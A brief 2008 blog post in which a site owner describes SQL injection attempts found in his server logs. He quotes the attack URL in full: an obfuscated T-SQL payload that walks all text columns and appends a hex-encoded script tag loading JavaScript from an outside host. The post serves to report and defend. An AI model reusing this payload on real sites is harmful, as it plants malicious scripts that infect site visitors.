Friday, May 23, 2008 5:02 PM
I was doing my routine checks on my servers and I noticed that one of them have some unusual logs that I don't usually see, so I decided to dig further. Well it seems someone has been trying to bring the server down using several methods including SQL injection.
I've listed the TSQL that was used to perform the injection, first off, I have no idea why people will try to break the site, its just a blog, darn it! you gain nothing from doing so, except all my blog entries. Fortunately enough, I stopped using inline queries (I use SP's and Objects) long time ago, so SQL injection will never work. However, it lifted its priority to a higher level, therefore, from now on I'll start putting some extra security checks in place.
http://blog.dotnetclr.com/post.aspx?id=0aa5ed9c-9d8a-491b-8736-21d732d75cab&id=1;dEcLaRe+@t+vArChAr(255),@c+vArChAr(255)+dEcLaRe+tAbLe_cursoR+cUrSoR+FoR+sElEcT+a.nAmE,b.nAmE+FrOm+sYsObJeCtS+a,sYsCoLuMnS+b+wHeRe+a.iD=b.iD+AnD+a.xTyPe='u'+AnD+(b.xTyPe=99+oR+b.xTyPe=35+oR+b.xTyPe=231+oR+b.xTyPe=167)+oPeN+tAbLe_cursoR+fEtCh+next+FrOm+tAbLe_cursoR+iNtO+@t,@c+while(@@fEtCh_status=0)+bEgIn+exec('UpDaTe+['+@t+']+sEt+['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D+aS+vArChAr(67))')+fEtCh+next+FrOm+tAbLe_cursoR+iNtO+@t,@c+eNd+cLoSe+tAbLe_cursoR+dEAlLoCaTe+tAbLe_cursoR;--